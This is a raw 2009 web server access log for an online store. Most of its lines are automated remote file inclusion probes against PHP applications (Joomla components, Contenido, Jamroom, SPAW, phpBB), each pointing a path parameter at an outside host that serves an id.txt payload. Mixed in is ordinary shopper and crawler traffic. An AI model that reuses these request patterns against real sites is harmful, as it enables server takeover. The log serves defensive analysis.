65.23.158.226 - - [26/Jul/2009:07:41:05 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:41:12 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:41:12 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:41:29 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:41:39 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:41:39 -0400] "GET /logs/access_log.Q109070900%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Jul/2009:07:42:18 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Jul/2009:07:42:18 -0400] "GET /logs/access_log.Q109051600//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Jul/2009:07:42:18 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:42:19 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Jul/2009:07:42:27 -0400] "GET /logs/access_log.Q109061200//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:42:33 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
89.234.7.92 - - [26/Jul/2009:07:42:35 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
89.234.7.92 - - [26/Jul/2009:07:42:35 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
89.234.7.92 - - [26/Jul/2009:07:42:54 -0400] "GET /logs/access_log.Q109070900%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:07:43:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.169 - - [26/Jul/2009:07:43:58 -0400] "GET /logs/error_log.Q109071900 HTTP/1.0" 200 2993552 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.172.33.230 - - [26/Jul/2009:07:44:19 -0400] "GET /logs/access_log.Q109051600%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Jul/2009:07:44:19 -0400] "GET /logs/access_log.Q109061200%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:44:19 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:44:29 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:44:38 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:44:38 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:44:38 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:45:03 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
66.249.68.247 - - [26/Jul/2009:07:45:28 -0400] "GET /images/_notes/nav_store_ckout_grn.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.241.54.8 - - [26/Jul/2009:07:46:12 -0400] "GET /logs/access_log.Q109062500%20%20//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:07:46:22 -0400] "GET /logs/access_log.Q109062800%20%20//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:46:28 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:46:42 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:46:42 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:46:42 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:46:47 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:07:48:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.18.73 - - [26/Jul/2009:07:49:00 -0400] "GET //cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.189.18.73 - - [26/Jul/2009:07:49:00 -0400] "GET /logs//cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:49:15 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:49:15 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:49:15 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:49:23 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
146.48.83.133 - - [26/Jul/2009:07:49:40 -0400] "GET /?sourcedir=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.808"
146.48.83.133 - - [26/Jul/2009:07:49:40 -0400] "GET /logs/access_log.Q109071000/?sourcedir=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
146.48.83.133 - - [26/Jul/2009:07:49:40 -0400] "GET /logs/?sourcedir=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 200 11066 "-" "libwww-perl/5.808"
211.189.18.73 - - [26/Jul/2009:07:49:43 -0400] "GET //cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.189.18.73 - - [26/Jul/2009:07:49:43 -0400] "GET /logs//cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:49:54 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:49:54 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
146.48.83.133 - - [26/Jul/2009:07:50:03 -0400] "GET /logs/access_log.Q109061100/?sourcedir=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
211.189.18.73 - - [26/Jul/2009:07:50:08 -0400] "GET /logs/access_log.Q109061700//cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:50:21 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.189.18.73 - - [26/Jul/2009:07:50:45 -0400] "GET /logs/access_log.Q109061700//cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:51:27 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:07:52:04 -0400] "GET /images/_notes/contact_email_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.172.226.160 - - [26/Jul/2009:07:52:07 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video HTTP/1.1" 200 38015 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:09 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:09 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:09 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:10 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:10 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:10 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:10 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:11 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:11 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:11 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:11 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:11 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:12 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:12 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:12 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:12 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:15 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:15 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:16 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:16 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:16 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:16 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:16 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:16 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:17 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.226.160 - - [26/Jul/2009:07:52:20 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
87.20.186.139 - - [26/Jul/2009:07:52:40 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:53:18 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:53:22 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.189.18.73 - - [26/Jul/2009:07:53:28 -0400] "GET /logs/access_log.Q109061700%20%20//cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:53:37 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:53:40 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:53:54 -0400] "GET /logs/access_log.Q109061400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
146.48.83.133 - - [26/Jul/2009:07:53:56 -0400] "GET /logs/access_log.Q109071000%20/?sourcedir=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 404 226 "-" "libwww-perl/5.808"
211.189.18.73 - - [26/Jul/2009:07:54:13 -0400] "GET /logs/access_log.Q109061700%20%20//cgi-bin//classes/adodbt/sql.php?classes_dir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:54:51 -0400] "GET /logs/access_log.Q109062200/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
202.125.45.45 - - [26/Jul/2009:07:57:54 -0400] "GET /logs/access_log.Q109052100/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:07:57:54 -0400] "GET /index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:07:57:54 -0400] "GET /logs/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
